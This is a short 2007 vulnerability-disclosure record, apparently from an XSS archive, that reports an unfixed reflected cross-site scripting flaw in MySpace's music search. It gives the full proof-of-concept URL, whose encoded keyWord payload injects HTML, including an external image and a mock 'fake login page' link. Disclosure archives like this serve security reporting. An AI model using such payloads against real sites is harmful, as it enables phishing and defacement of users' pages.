Security researcher Hexspirit, has submitted on 27/03/2007 a cross-site-scripting (XSS) vulnerability affecting musicsearch.myspace.com, which at the time of submission ranked 5 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 27/03/2007. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 27/03/2007 |
Date published: 27/03/2007 |
Fixed? Mail us! | Status: UNFIXED |
Author: Hexspirit |
Domain: musicsearch.myspace.com |
Category: XSS |
Pagerank: 5 |
URL: http://musicsearch.myspace.com/index.cfm?fuseaction=classifieds.searchCategory&keyWord=%22%3E%3Ch1%3 EMySpace%20X%20SS%3C/h1%3E%3CA%20HREF=%22http://www.xssed.com/%22%3EXSS%20(Fake%20myspace.com%20logi n%20page)%3Cbr%3E%3Cimg%20src=%22http://img62.imageshack.us/img62/4615/stallowned3hb.jpg%22%3E%3C/A% 3E%3Cbr%3E%3Cinput%20type=%22text%22%20value=%22Hexspirit%22%20/%3E%3Cbr%3E%3Cmarquee%3EROTFL!%20LMA O<? |
Click here to view the mirror
|
|
|